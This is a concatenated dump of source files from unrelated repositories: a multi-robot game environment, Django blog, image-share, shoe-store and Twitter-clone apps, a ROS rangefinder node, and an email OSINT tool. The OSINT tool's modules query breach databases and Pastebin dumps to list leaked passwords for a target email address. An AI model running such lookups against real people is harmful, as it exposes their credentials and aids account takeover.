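vid_link, vid_cat, vid_len = row[0], row[3], row[4]
assert 30 <= int(vid_len) <= 240  # only clips of 30-240 seconds download
```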
{
"source": "JosephDistefano/offset-human-interface",
"score": 3
} |
#### File: offset-game/envs/primitive_manager.py
```python
import numpy as np
from scipy import interpolate
from primitives.planning.planners import SkeletonPlanning
from primitives.formation.control import FormationControl
class PrimitiveManager(object):
def __init__(self, state_manager):
self.config = state_manager.config
self.state_manager = state_manager
self.planning = SkeletonPlanning(self.state_manager.config,
self.state_manager.grid_map)
self.formation = FormationControl()
return None
def set_parameters(self, primitive_info):
"""Set up the parameters of the premitive execution
Parameters
----------
primitive_info: dict
A dictionary containing information about vehicles
            and primitive-related parameters.
"""
# Update vehicles
self.vehicles_id = primitive_info['vehicles_id']
if primitive_info['vehicle_type'] == 'uav':
self.vehicles = [
self.state_manager.uav[j] for j in self.vehicles_id
]
else:
self.vehicles = [
self.state_manager.ugv[j] for j in self.vehicles_id
]
self.n_vehicles = len(self.vehicles)
# Primitive parameters
self.primitive_id = primitive_info['primitive_id']
self.formation_type = primitive_info['formation_type']
self.end_pos = primitive_info['end_pos']
self.count = 0
return None
def make_vehicles_idle(self):
for vehicle in self.vehicles:
vehicle.idle = True
return None
def make_vehicles_nonidle(self):
for vehicle in self.vehicles:
vehicle.idle = False
return None
def get_centroid(self):
centroid = []
for vehicle in self.vehicles:
centroid.append(vehicle.current_pos)
centroid = np.mean(np.asarray(centroid), axis=0)
return centroid[0:2] # only x and y
def convert_pixel_ordinate(self, point, ispixel):
if not ispixel:
converted = [point[0] / 0.42871 + 145, point[1] / 0.42871 + 115]
else:
converted = [(point[0] - 145) * 0.42871,
(point[1] - 115) * 0.42871]
return converted
def get_spline_points(self):
# Perform planning and fit a spline
self.start_pos = self.centroid_pos
pixel_start = self.convert_pixel_ordinate(self.start_pos,
ispixel=False)
pixel_end = self.convert_pixel_ordinate(self.end_pos, ispixel=False)
path = self.planning.find_path(pixel_start, pixel_end, spline=False)
# Convert to cartesian co-ordinates
points = np.zeros((len(path), 2))
for i, point in enumerate(path):
points[i, :] = self.convert_pixel_ordinate(point, ispixel=True)
        # Scale the number of spline samples with the straight-line
        # distance between the start and end positions
        segment_length = np.linalg.norm(self.start_pos - self.end_pos)
        n_steps = int(np.floor(segment_length / 200 * 250))
if points.shape[0] > 3:
tck, u = interpolate.splprep(points.T)
unew = np.linspace(u.min(), u.max(), n_steps)
x_new, y_new = interpolate.splev(unew, tck)
# points = interpcurve(250, x_new, y_new)
# x_new, y_new = points[:, 0], points[:, 1]
else:
# Find unique points
points = np.array(list(set(tuple(p) for p in points)))
f = interpolate.interp1d(points[:, 0], points[:, 1])
x_new = np.linspace(points[0, 0], points[-1, 0], 10)
y_new = f(x_new)
new_points = np.array([x_new, y_new]).T
return new_points, points
def execute_primitive(self, p_simulation):
"""Perform primitive execution
"""
primitives = [self.planning_primitive, self.formation_primitive]
done = primitives[self.primitive_id - 1]()
# Step the simulation
p_simulation.stepSimulation()
return done
def planning_primitive(self):
"""Performs path planning primitive
"""
# Make vehicles non idle
self.make_vehicles_nonidle()
done_rolling = False
if self.count == 0:
# First point of formation
self.centroid_pos = self.get_centroid()
self.next_pos = self.centroid_pos
done = self.formation_primitive()
if done:
self.count = 1
self.new_points, points = self.get_spline_points()
else:
self.centroid_pos = self.get_centroid()
distance = np.linalg.norm(self.centroid_pos - self.end_pos)
if len(self.new_points) > 2 and distance > 5:
self.next_pos = self.new_points[0]
self.new_points = np.delete(self.new_points, 0, 0)
else:
self.next_pos = self.end_pos
self.formation_primitive()
if distance < 0.5:
done_rolling = True
if done_rolling:
self.make_vehicles_idle()
return done_rolling
def formation_primitive(self):
"""Performs formation primitive
"""
if self.primitive_id == 2:
self.centroid_pos = self.end_pos
self.next_pos = self.end_pos
dt = self.config['simulation']['time_step']
self.vehicles, done = self.formation.execute(self.vehicles,
self.next_pos,
self.centroid_pos, dt,
self.formation_type)
for vehicle in self.vehicles:
vehicle.set_position(vehicle.updated_pos)
return done
```
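get_spline_points above fits a parametric spline through the planner's waypoints whenever more than three points are available. A minimal standalone sketch of that splprep/splev resampling, with made-up waypoints:
```python
import numpy as np
from scipy import interpolate

points = np.array([[0.0, 0.0], [1.0, 2.0], [3.0, 3.0], [5.0, 2.0]])

# Fit a parametric spline through the 2-D waypoints, then sample it
# uniformly in the spline parameter to get evenly spaced path points.
tck, u = interpolate.splprep(points.T)
unew = np.linspace(u.min(), u.max(), 25)
x_new, y_new = interpolate.splev(unew, tck)
path = np.array([x_new, y_new]).T  # shape (25, 2)
```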
#### File: offset-game/envs/rewards.py
```python
import numpy as np
class BenningReward(object):
def __init__(self, state_manager):
self.state_manager = state_manager
self.current_time = state_manager.current_time
self.config = state_manager.config
def get_time_dist(self, vehicle, target_pos):
"""Calculated the information of probable goal building
Parameters
---------
vehicle : vehicle class
We use the speed and current position
target_pos : array
final desired position of robot
Returns
-------
float
time to reach the target [minimum time]
"""
# Read from co-ordinate file
diff = np.asarray(vehicle.current_pos[0:2]) - np.asarray(target_pos)
distance = np.linalg.norm(diff)
if vehicle.type == 'uav':
time_to_reach = distance / vehicle.speed
elif vehicle.type == 'ugv':
time_to_reach = self.config['ugv'][
'coef_slowness'] * distance / vehicle.speed
# path_RRT = path_planning(vehicle.current_pos, target_pos)
# total_distance = np.sum(np.linalg.norm(np.diff(path_RRT)))
# time_to_reach = total_distance / vehicle.speed
return time_to_reach
def goal_information(self, goal_id, config):
"""Calculates the information of probable goal building
Parameters
----------
goal_id : int
Goal ID
config : yaml
The configuration file
Returns
-------
dict
A dictionary containing goal position, perimeter, floors,
progress, and probability
"""
# Read from co-ordinate file
node_info = self.state_manager.target_info(goal_id)
info = {}
info['goal_position'] = node_info['position']
info['perimeter'] = node_info['perimeter']
info['floors'] = node_info['n_floors']
info['goal_progress'] = 0
info['goal_probability'] = 0
return info
def mission_reward(self, ugv, uav, config):
"""Caculated the total mission reward depending on the progress
Parameters
----------
ugv : list
List of all UGVs
uav : list
List of all UAVs
config : yaml
The configuration file
Returns
-------
float
The reward for the mission at an instant of time.
"""
# Simulation parameters
total_time = config['simulation']['total_time']
goals = config['simulation']['goal_node']
# UAV reward weight parameters
w_time_uav = config['weights']['w_time_uav']
w_battery_uav = config['weights']['w_battery_uav']
w_b_UAV_0 = 1 # Need to implement
# Reward for UAV
r_uav_time = 0
r_uav_battery = 0
# Calculate the reward for UAV
for vehicle in uav:
r_uav_battery += w_battery_uav * vehicle.battery / w_b_UAV_0
for goal in goals:
position, _ = vehicle.get_pos_and_orientation()
info = self.goal_information(goal, self.config)
time_to_goal = self.get_time_dist(vehicle,
info['goal_position'])
r_uav_time += w_time_uav * (1 - info['goal_progress']) * (
total_time - time_to_goal) / total_time
# Reward for UGV
r_ugv_time = 0
r_ugv_ammo = 0
# UGV reward weight parameters
w_time_ugv = config['weights']['w_time_ugv']
w_battery_ugv = config['weights']['w_ammo_ugv']
w_b_ugv_0 = 1 # Need to implement
# Calculate the reward for UGV
for vehicle in ugv:
r_ugv_ammo += w_battery_ugv * vehicle.ammo / w_b_ugv_0
for goal in goals:
position, _ = vehicle.get_pos_and_orientation()
info = self.goal_information(goal, self.config)
time_to_goal = self.get_time_dist(vehicle,
info['goal_position'])
r_ugv_time += w_time_ugv * (1 - info['goal_progress']) * (
total_time - time_to_goal) / total_time
# Search reward parameters
w_search = self.config['weights']['w_search']
# mission_success = self.config['weights']['mission_success']
r_search = 0
for target in self.state_manager.target:
r_search += w_search * target['progress_goals']
# for vehicle in ugv:
# position = vehicle.get_pos_and_orientation()
# for goal in range(n_goals):
# info = goal_information(goal)
# time_to_goal = get_time_dist(vehicle, info['goal_position'])
        # # Need to implement inside building search
# # inside_search_time = get_t_search_inside(info['perimeter'] * # noqa
# # info['floors'])
# # r_search += w_search * info['goal_probability'] * info[
# # 'goal_progress'] * (total_time -
# # inside_search_time) / total_time
reward = r_ugv_time + r_ugv_ammo + r_uav_time + r_uav_battery + r_search # noqa
return reward
```
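The same time-weighted term is computed for both vehicle classes above; a minimal sketch isolating it (the argument names are stand-ins for the config weights and goal-info values, not part of the original module):

```python
def time_reward(w, progress, time_to_goal, total_time):
    """Pays less as the goal nears completion or lies farther away."""
    return w * (1 - progress) * (total_time - time_to_goal) / total_time

# With no progress and a goal reachable instantly, the full weight is paid out.
assert time_reward(w=1.0, progress=0.0, time_to_goal=0.0, total_time=100.0) == 1.0
```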
#### File: offset-game/gui/information.py
```python
import pygame
def get_window_size(screen_size):
size = (0.225 * screen_size[0], 0.75 * screen_size[1])
return size
def get_position(screen_size):
position = (10 + 0.75 * screen_size[0], 5 + 0.0 * screen_size[1])
return position
class Information(pygame.sprite.Sprite):
def __init__(self, screen, screen_size):
super().__init__()
self.position = get_position(screen_size)
self.surface = pygame.Surface(get_window_size(screen_size))
self.surface.fill((0, 0, 0))
screen.blit(self.surface, self.position)
def update(self, screen):
self.surface.fill(pygame.Color('dodgerblue'))
``` |
{
"source": "josephdoan0105/mosint",
"score": 3
} |
#### File: mosint/insides/Header.py
```python
from insides.bcolors import bcolors
def Header(title):
print("")
print("-------------------------------")
print(f"{bcolors.OKGREEN}>{bcolors.ENDC}"+title)
print("-------------------------------")
```
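A usage sketch matching the calls in mosint.py further below; it assumes the mosint package layout is importable and that bcolors holds ANSI escape codes:

```python
from insides.Header import Header

Header("VERIFICATION SERVICE")
# Prints:
# -------------------------------
# >VERIFICATION SERVICE    (the ">" rendered in green)
# -------------------------------
```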
#### File: mosint/modules/LeakedDB.py
```python
import requests
from insides.bcolors import bcolors
from prettytable import PrettyTable
def LeakedDB(mail,_verbose=None):
    if _verbose is not None:
try:
res = requests.get(f"https://scylla.sh/search?q=email:{mail}&size=50&start=0", headers={'Accept': 'application/json'}).json()
table = PrettyTable(["Domain","Email",f"{bcolors.FAIL}Password{bcolors.ENDC}"])
if len(res):
for s in res:
table.add_row([s["fields"]["domain"],s["fields"]["email"],s["fields"].get("password") or s["fields"].get("passhash") or "No Pass Data"])
print(table)
else:
print(f"{bcolors.FAIL}No leaked accounts found!{bcolors.ENDC}")
except Exception as e:
print(e)
print(f"{bcolors.FAIL}Leaked DB Connection Error!{bcolors.ENDC}")
```
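The table-building code implies a shape for each scylla.sh hit; the sketch below is inferred purely from the field accesses above, not from an official schema:

```python
# Hypothetical hit, shaped to match the lookups in LeakedDB().
sample_hit = {
    "fields": {
        "domain": "example.com",
        "email": "user@example.com",
        "password": "hunter2",  # may instead be "passhash", or absent
    }
}
row = [sample_hit["fields"]["domain"],
       sample_hit["fields"]["email"],
       sample_hit["fields"].get("password")
       or sample_hit["fields"].get("passhash")
       or "No Pass Data"]
print(row)  # ['example.com', 'user@example.com', 'hunter2']
```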
#### File: mosint/modules/Psbdmp.py
```python
from bs4 import BeautifulSoup
import json, requests
from insides.bcolors import bcolors
def Psbdmp(mail,_verbose=None):
    if _verbose is not None:
try:
print(f"{bcolors.WARNING} -- Scanning Pastebin Dumps...{bcolors.ENDC}\n")
res = requests.get(f"https://psbdmp.ws/api/search/{mail}",headers={ "Accept": "application/json" }).json().get('data') or []
if len(res):
for i in res:
print(f"{bcolors.OKGREEN}|-- {bcolors.ENDC}"+"https://pastebin.com/"+i['id'])
else:
print(f"{bcolors.FAIL}No psbdump records found!{bcolors.ENDC}")
except:
print(f"{bcolors.FAIL}Psbdump Error!{bcolors.ENDC}")
```
#### File: josephdoan0105/mosint/mosint.py
```python
import json, re
from insides.bcolors import bcolors
from insides.Header import Header
def parse_args():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-e', '--email', type=str, required=True, help="Email")
return parser.parse_args()
# TODO: Clean boolean in string.
def main():
args = parse_args()
mail = args.email
EMAIL_REGEX = r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)'
if not re.match(EMAIL_REGEX, mail):
print(f"{bcolors.FAIL}Email format is wrong!{bcolors.ENDC}")
exit()
with open('config.json', "r") as configFile:
conf = json.loads(configFile.read())
for i in conf:
verifyApi = (i['verify-email.org API Key'])
socialscan = (i['Social Scan'])
leakeddb = (i['Leaked DB'])
breachedsites = (i['Breached Sites[leak-lookup.com API Key]'])
hunterApi = (i['hunter.io API Key'])
checkPDF = (i['PDF Check for Related Emails'])
dbdata = (i['Related Phone Numbers'])
tcrwd = (i['Related Domains'])
pastebindumps = (i['Pastebin Dumps'])
googlesearch = (i['Google Search'])
dns = (i['DNS Lookup'])
from insides.Banner import Banner
Banner()
from modules.ConfigTree import ConfigTree
ConfigTree(verifyApi,socialscan,leakeddb,breachedsites,hunterApi,checkPDF,dbdata,tcrwd,pastebindumps,googlesearch,dns,_verbose=True)
print("")
if (verifyApi != ""):
from modules.VerifyMail import VerifyMail
title = "VERIFICATION SERVICE"
Header(title)
VerifyMail(verifyApi,mail,_verbose=True)
if (socialscan == "True" or socialscan == "T" or socialscan == "true"):
from modules.SocialScan import SocialScan
title = "SOCIAL SCAN"
Header(title)
SocialScan(mail,_verbose=True)
if (leakeddb == "True" or leakeddb == "T" or leakeddb == "true"):
from modules.LeakedDB import LeakedDB
title = "LEAKED DB [Password dumps]"
Header(title)
LeakedDB(mail,_verbose=True)
if (breachedsites != ""):
from modules.BreachedSites import BreachedSites
title = "BREACHED SITES"
Header(title)
BreachedSites(mail,breachedsites,_verbose=True)
if (hunterApi != ""):
from modules.Hunter import Hunter
title = "RELATED EMAILS"
Header(title)
Hunter(mail,hunterApi,_verbose=True)
if (checkPDF == "True" or checkPDF == "T" or checkPDF == "true"):
from modules.PDFcheck import PDFcheck
title = "RELATED EMAILS IN PDFs"
Header(title)
PDFcheck(mail,_verbose=True)
if (dbdata == "True" or dbdata == "T" or dbdata == "true"):
from modules.RelatedNumbers import RelatedNumbers
title = "RELATED PHONE NUMBERS"
Header(title)
RelatedNumbers(mail,_verbose=True)
if (tcrwd == "True" or tcrwd == "T" or tcrwd == "true"):
from modules.RelatedDomains import RelatedDomains
title = "RELATED DOMAINS"
Header(title)
RelatedDomains(mail,_verbose=True)
if (pastebindumps == "True" or pastebindumps == "T" or pastebindumps == "true"):
from modules.Psbdmp import Psbdmp
title = "PASTEBIN DUMPS"
Header(title)
Psbdmp(mail,_verbose=True)
if (googlesearch == "True" or googlesearch == "T" or googlesearch == "true"):
from modules.Googling import Googling
title = "GOOGLING"
Header(title)
Googling(mail,_verbose=True)
if (dns == "True" or dns == "T" or dns == "true"):
from modules.DNS import DNS
title = "DNS LOOKUP"
Header(title)
DNS(mail,_verbose=True)
main()
``` |
{
"source": "joseph-d-p/altair",
"score": 2
} |
#### File: examples/tests/test_examples.py
```python
import pkgutil
import pytest
from altair.utils.execeval import eval_block
from altair import examples
def iter_example_filenames():
for importer, modname, ispkg in pkgutil.iter_modules(examples.__path__):
if ispkg or modname.startswith('_'):
continue
yield modname + '.py'
@pytest.mark.parametrize('filename', iter_example_filenames())
def test_examples(filename):
source = pkgutil.get_data(examples.__name__, filename)
chart = eval_block(source)
if chart is None:
raise ValueError("Example file should define chart in its final "
"statement.")
chart.to_dict()
``` |
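A minimal example file that would satisfy this test: eval_block() returns the value of the file's final expression, so the chart must be the last statement (the data here is illustrative):

```python
import altair as alt
import pandas as pd

source = pd.DataFrame({'x': [1, 2, 3], 'y': [4, 5, 6]})

alt.Chart(source).mark_line().encode(x='x', y='y')
```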
{
"source": "josephdubon/boilerplate_dubon_django_blog",
"score": 3
} |
#### File: blog/templatetags/blog_tags.py
```python
from django import template
from django.db.models import Count
from django.utils.safestring import mark_safe
import markdown
from ..models import Post
register = template.Library()
####
# Register as simple tags
####
# A simple template tag that returns the number of posts published so far.
@register.simple_tag
def total_posts():
return Post.published.count()
# A simple template tag that displays the 5 most commented posts
@register.simple_tag
def get_most_commented_posts(count=5):
# Build a QuerySet using the annotate() function to aggregate the
# - total number of comments for each post.
return Post.published.annotate(
# use the Count aggregation function to store the number of comments
# - in the computed field total_comments for each Post object.
total_comments=Count('comments')
).order_by('-total_comments')[:count]
####
# Register as inclusion_tags
####
# An inclusion tag that returns the 5 latest posts.
@register.inclusion_tag('blog/post/latest_posts.html')
def show_latest_posts(count=5):
latest_posts = Post.published.order_by('-publish')[:count]
return {
'latest_posts': latest_posts
}
####
# Register Template Filters
####
# A template filter to enable use of markdown .md syntax in blog posts and then converts
# - post contents to HTML in the templates
@register.filter(name='markdown')
def markdown_format(text):
return mark_safe(markdown.markdown(text))
``` |
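A quick smoke test of these tags from a configured Django shell; it assumes the blog app is in INSTALLED_APPS, and the body string is illustrative:

```python
from django.template import Context, Template

tpl = Template(
    "{% load blog_tags %}"
    "Published so far: {% total_posts %}. "
    "{{ body|markdown }}"
)
print(tpl.render(Context({'body': '**hello** world'})))
```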
{
"source": "josephdubon/boilerplate_image_share_app",
"score": 3
} |
#### File: boilerplate_image_share_app/account/forms.py
```python
from django import forms
from django.contrib.auth.models import User
from .models import Profile
# Login form
class LoginForm(forms.Form):
username = forms.CharField()
password = forms.CharField(widget=forms.PasswordInput)
# User registration form
class UserRegistrationForm(forms.ModelForm):
    # Two additional fields, password and password2,
    # for users to set their password and confirm it.
password = forms.CharField(label='Password',
widget=forms.PasswordInput)
password2 = forms.CharField(label='Repeat Password',
widget=forms.PasswordInput)
class Meta:
model = User
# Include only the username, first_name, and email fields of the model.
fields = (
'username',
'first_name',
'email',
)
def clean_password2(self):
cd = self.cleaned_data
# Use the field-specific clean_password2() validation.
        if cd['password'] != cd['password2']:
raise forms.ValidationError('Passwords do not match.')
return cd['password2']
# Edit user form
class UserEditForm(forms.ModelForm):
class Meta:
model = User
fields = (
'first_name',
'last_name',
'email',
)
# Edit user profile form
class ProfileEditForm(forms.ModelForm):
class Meta:
model = Profile
fields = (
'date_of_birth',
'photo',
)
```
#### File: boilerplate_image_share_app/account/views.py
```python
from django.http import HttpResponse
from django.shortcuts import render
from django.contrib import messages
from django.contrib.auth import authenticate, login
from django.contrib.auth.decorators import login_required
from .forms import (
LoginForm,
UserRegistrationForm,
UserEditForm,
ProfileEditForm
)
from .models import Profile
# Login view
def user_login(request):
if request.method == "POST":
# Instantiate the form with the submitted data with form = LoginForm(request.POST).
form = LoginForm(request.POST)
# Check whether the form is valid with form.is_valid(). If it is not valid, you display
# - the form errors in your template (for example, if the user didn't fill in one of the fields).
if form.is_valid():
cd = form.cleaned_data
# Authenticate the user against the database using the authenticate() method.
user = authenticate(request,
username=cd['username'],
password=cd['password']
)
if user is not None:
# If user is registered and active log user in
if user.is_active:
login(request, user)
return HttpResponse('Authenticated successfully')
else:
# If user account is disabled
return HttpResponse('Disabled account')
else:
                # If the credentials are invalid
return HttpResponse('Invalid login')
else:
# Return clean form
form = LoginForm()
return render(request, 'account/login.html', {
'form': form
})
# Dashboard view
# Check if current user is authenticated
@login_required
def dashboard(request):
return render(request,
'account/dashboard.html',
{
'section': 'dashboard'
})
# User registration view
def register(request):
if request.method == 'POST':
user_form = UserRegistrationForm(request.POST)
if user_form.is_valid():
# Create a new user obj but don't save yet
new_user = user_form.save(commit=False)
# Set the chosen password
# For security reasons, instead of saving the raw password entered by the
# - user, you use the set_password() method of the user model that handles hashing.
new_user.set_password(
user_form.cleaned_data['password'])
# Save the user obj
new_user.save()
            # Create an empty profile for the user
Profile.objects.create(user=new_user)
return render(request,
'account/register_done.html',
{
'new_user': new_user
})
else:
user_form = UserRegistrationForm()
return render(request,
'account/register.html',
{
'user_form': user_form
})
# Edit user and profile view
@login_required
def edit(request):
if request.method == 'POST':
user_form = UserEditForm(instance=request.user,
data=request.POST)
profile_form = ProfileEditForm(
instance=request.user.profile,
data=request.POST,
files=request.FILES)
if user_form.is_valid() and profile_form.is_valid():
user_form.save()
profile_form.save()
# Send message to user on success
messages.success(request,
'Profile updated successfully')
else:
# Send message to user on fail
messages.error(request,
'Error updating your profile')
else:
user_form = UserEditForm(instance=request.user)
profile_form = ProfileEditForm(
instance=request.user.profile)
return render(request,
'account/edit.html',
{'user_form': user_form,
'profile_form': profile_form})
``` |
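A plausible account/urls.py wiring these views; the paths and route names are assumptions, not taken from the original project:

```python
from django.urls import path
from . import views

urlpatterns = [
    path('login/', views.user_login, name='login'),
    path('register/', views.register, name='register'),
    path('edit/', views.edit, name='edit'),
    path('', views.dashboard, name='dashboard'),
]
```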
{
"source": "josephdubon/shoe-store-api",
"score": 3
} |
#### File: nutshell_config/nutshell_app/models.py
```python
from django.db import models
"""
Your Task
This assignment is to use Django REST framework and a fresh Django server
to create an API as a potential demo for a shoe store with the following
models, broken out for standardization:
Manufacturer
name: str
website: url
---
ShoeType
style: str
---
ShoeColor
color_name: str (ROYGBIV + white / black) -->
hint: https://docs.djangoproject.com/en/3.0/ref/models/fields/#choices
---
Shoe
size: int
brand name: str
manufacturer: FK (Foreign Key)
color: FK
material: str
shoe_type: FK
fasten_type: str
"""
# Manufacturer
class NSManufacturer(models.Model):
"""
name: str
website: url
"""
name = models.CharField(max_length=50, blank=True, default='')
website = models.URLField()
def __str__(self):
return self.name
# ShoeType
class NSShoeType(models.Model):
"""
style: str
"""
style = models.CharField(max_length=50, blank=True, default='')
def __str__(self):
return self.style
# ShoeColor
class NSShoeColor(models.Model):
"""
# color_name: str (ROYGBIV + white / black) -->
# hint: https://docs.djangoproject.com/en/3.0/ref/models/fields/#choices
"""
ROYGBIV = 'RYG'
WHITE = 'WH'
BLACK = 'BLK'
COLOR_NAME_CHOICES = [
(ROYGBIV, 'ROYGBIV'),
(WHITE, 'White'),
(BLACK, 'Black'),
]
color_name = models.CharField(
max_length=3,
choices=COLOR_NAME_CHOICES,
default=WHITE,
)
def __str__(self):
return self.color_name
# Shoe
class NSShoe(models.Model):
"""
size: int
brand name: str
manufacturer: FK (Foreign Key)
color: FK
material: str
shoe_type: FK
fasten_type: str
"""
    size = models.IntegerField(blank=True, default=0)
brand_name = models.CharField(max_length=50, blank=True, default='')
    manufacturer = models.ForeignKey(NSManufacturer, on_delete=models.CASCADE)
color = models.ForeignKey(NSShoeColor, on_delete=models.CASCADE)
material = models.CharField(max_length=25, blank=True, default='')
shoe_type = models.ForeignKey(NSShoeType, on_delete=models.CASCADE)
fasten_type = models.CharField(max_length=25, blank=True, default='')
def __str__(self):
        return f'{self.size} {self.brand_name} {self.material} {self.fasten_type}'
``` |
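The assignment calls for a Django REST framework API over these models; a minimal serializer/viewset sketch for the Shoe model (module placement and router registration are left as assumptions):

```python
from rest_framework import serializers, viewsets
from .models import NSShoe

class NSShoeSerializer(serializers.ModelSerializer):
    class Meta:
        model = NSShoe
        fields = '__all__'

class NSShoeViewSet(viewsets.ModelViewSet):
    queryset = NSShoe.objects.all()
    serializer_class = NSShoeSerializer
```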
{
"source": "josephdubon/twitter-clone-django",
"score": 2
} |
#### File: twitter-clone-django/tweet/views.py
```python
from django.contrib.auth.decorators import login_required
from django.http import HttpResponseRedirect
from django.shortcuts import render, reverse
from twitteruser.models import TwitterUser
from .models import Tweet
from .forms import CreateTweetForm
from twitterclone import settings
# Home tweet list view
@login_required
def tweet_home_view(request):
twitteruser_obj = request.user
tweets_total = Tweet.objects.filter(author=twitteruser_obj).count()
followers_total = twitteruser_obj.followers.count()
tweets = Tweet.objects.all().order_by('-create_time')
tweets = [tweet for tweet in tweets if tweet.author in request.user.followers.all() or request.user == tweet.author]
return render(request, 'home.html', {
'twitteruser_obj': twitteruser_obj,
'tweets_total': tweets_total,
'followers_total': followers_total,
'tweets': tweets,
}
)
# Tweet list view
@login_required
def tweet_list_view(request):
tweets = Tweet.objects.all().order_by('-create_time')
return render(request, 'tweet_list.html', {
'tweets': tweets,
}
)
# Tweet detail view
def tweet_detail_view(request, tweet_id):
tweet = Tweet.objects.get(id=tweet_id)
return render(request, 'tweet_detail.html', {
'tweet': tweet
}
)
# Create tweet view
@login_required
def create_tweet(request):
context = {}
if request.method == "POST":
form = CreateTweetForm(request.POST)
if form.is_valid():
data = form.cleaned_data
            new_tweet = Tweet.objects.create(
title=data['title'],
author=request.user,
body=data['body'],
)
            if new_tweet:
return HttpResponseRedirect(reverse('home'))
form = CreateTweetForm()
context.update({'form': form})
return render(
request,
'create_tweet.html',
context
)
```
#### File: twitter-clone-django/twitteruser/models.py
```python
from django.db import models
from django.contrib.auth.models import AbstractUser
class TwitterUser(AbstractUser):
followers = models.ManyToManyField(
'self',
related_name='follows',
symmetrical=False,
blank=True
)
bio = models.TextField(default='User has not written bio yet...')
update_time = models.DateTimeField(auto_now=True)
create_time = models.DateTimeField(auto_now_add=True)
    def twitteruser_tweets(self):
        # The original body called itself recursively; return the user's tweets
        # instead (assumes Tweet.author keeps the default related_name tweet_set).
        return self.tweet_set.all()
def __str__(self):
return self.username
class Meta:
ordering = ('-create_time',)
``` |
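Because symmetrical=False, the follower relation is one-directional; a Django shell sketch (usernames are illustrative):

```python
from twitteruser.models import TwitterUser

alice = TwitterUser.objects.create_user(username='alice', password='x')
bob = TwitterUser.objects.create_user(username='bob', password='x')

alice.followers.add(bob)
assert bob in alice.followers.all()       # forward accessor
assert alice in bob.follows.all()         # reverse accessor via related_name
assert alice not in bob.followers.all()   # no automatic mirroring
```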
{
"source": "josephduchesne/range_array",
"score": 3
} |
#### File: src/range_array/RangeNode.py
```python
from serial import Serial
import rospy, time, tf2_ros, tf_conversions, geometry_msgs
from sensor_msgs.msg import LaserScan
from sensor_msgs.msg import Range
serial_port = None
scan_pub = None
range_pub = []
# position of each sensor: x (m), y (m), yaw (deg), pitch (deg)
range_pos = [[-0.23,0.055,-3.5*26, 11.2], [-0.1725, 0.015, -2.5*26, 11.2], [-0.115,0,-1.5*26, 11.2], [-0.0575, 0, -0.5*26, 11.2], \
[0.0575, 0, 0.5*26, 11.2], [0.115,0,1.5*26, 11.2], [0.1725, 0.015, 2.5*26, 11.2], [0.23,0.055,3.5*26, 11.2]]
def init(port):
global serial_port, scan_pub, range_pub
rospy.init_node('range_node') # Init ROS
# Initialize all publishers
scan_pub = rospy.Publisher('/range_array_scan', LaserScan, queue_size=1)
for i in range(0,8):
range_pub.append(rospy.Publisher('/range_pub_%d' % i, Range, queue_size=1))
# Connect to the arduino
print("Init Serial %s" % port)
serial_port = Serial(port, 115200, timeout=None, stopbits = 1)
time.sleep(1) #nap while the arduino boots
def parse_sensor_data(line):
global scan_pub, range_pub
# Handle debug text from the arduino
if "," not in line:
rospy.loginfo("RangeNode: %s" % line)
return
# Parse the range string into a float array
ranges = [float(x)/1000.0 for x in line.split(",")[::-1]]
if len(ranges) != 8:
rospy.logwarn("Received other than 8 scan ranges", ranges)
return
br = tf2_ros.TransformBroadcaster()
# msg = LaserScan()
# msg.header.frame_id = "base_link"
# msg.header.stamp = rospy.Time.now()
# msg.angle_increment = 26.0/180.0*3.141592
# msg.angle_min = msg.angle_increment*-3.5
# msg.angle_max = msg.angle_increment*3.5
# msg.range_min = 0.1
# msg.range_max = 4.0
# msg.ranges = ranges # reverse!
# scan_pub.publish(msg)
for i in range(0,8):
# Emit the range data for this range
rmsg = Range()
rmsg.header.frame_id = "base_link"
rmsg.header.stamp = rospy.Time.now()
rmsg.header.frame_id = "rangefinder_%d" % i
rmsg.min_range = 0.1
rmsg.max_range = 4.0
rmsg.field_of_view = 26.0/180.0*3.141592
rmsg.radiation_type = rmsg.INFRARED
rmsg.range = ranges[i]
range_pub[i].publish(rmsg)
# output the TF2 for this range
t = geometry_msgs.msg.TransformStamped()
t.header.stamp = rospy.Time.now()
t.header.frame_id = "base_footprint"
t.child_frame_id = rmsg.header.frame_id
t.transform.translation.x = range_pos[i][0]
t.transform.translation.y = range_pos[i][1]-0.2
t.transform.translation.z = 0.2
q = tf_conversions.transformations.quaternion_from_euler(0, -range_pos[i][3]/180.0*3.1415, range_pos[i][2]/180.0*3.1415-3.1415/2)
t.transform.rotation.x = q[0]
t.transform.rotation.y = q[1]
t.transform.rotation.z = q[2]
t.transform.rotation.w = q[3]
br.sendTransform(t)
def main():
global serial_port, scan_pub
init('/dev/ttyUSB1')
# Wait for serial lines, emitting ROS messages whenever one is received
rate = rospy.Rate(100)
while not rospy.is_shutdown():
while serial_port.inWaiting():
parse_sensor_data(serial_port.readline().strip())
rate.sleep()
if __name__ == '__main__':
try:
main()
except rospy.ROSInterruptException:
pass
``` |
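The wire format parse_sensor_data() expects is eight comma-separated millimetre readings per line, reversed into sensor order and scaled to metres; a standalone demonstration with made-up values:

```python
line = "102,250,400,980,1200,2300,3100,3999"
ranges = [float(x) / 1000.0 for x in line.split(",")[::-1]]
print(ranges)  # [3.999, 3.1, 2.3, 1.2, 0.98, 0.4, 0.25, 0.102]
```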
{
"source": "josephDuque/FinalYearProjectQTNM_u1803982",
"score": 2
} |
#### File: 2_Trajectories/motionWLorentzForce/plotTrajectory.py
```python
import sys, getopt
import numpy as np
import matplotlib.cm as cm
import matplotlib.pyplot as plt
import matplotlib.cbook as cbook
import matplotlib.animation as animation
from mpl_toolkits.mplot3d import Axes3D
from scipy import ndimage
# ----------------------------------------------------------
plt.rcParams.update({
"text.usetex": True,
"font.size" : 12,
"font.family": "sans-serif",
"font.sans-serif": ["Helvetica"]})
# for Palatino and other serif fonts use:
plt.rcParams.update({
"text.usetex": True,
"font.size" : 12,
"font.family": "serif",
"font.serif": ["Palatino"],
})
# ----------------------------------------------------------
#print("backend", plt.rcParams["backend"])
#plt.rcParams["backend"] = "TkAgg" # doesn't actually set the backend
#matplotlib.use("TkAgg")
print("backend", plt.rcParams["backend"])
#print("sys.float_info.dig = ", sys.float_info.dig)
#print("sys.float_info.mant_dig = ", sys.float_info.mant_dig)
lowEps = np.finfo(float).eps * 100.0  # np.float alias removed in NumPy 1.24
#print("lower precision limit=",lowEps)
# ----------------------------------------------------------
def main(argv):
inputfile = ''
outputfile = ''
try:
opts, args = getopt.getopt(argv,"hi:o:",["ifile=","ofile="])
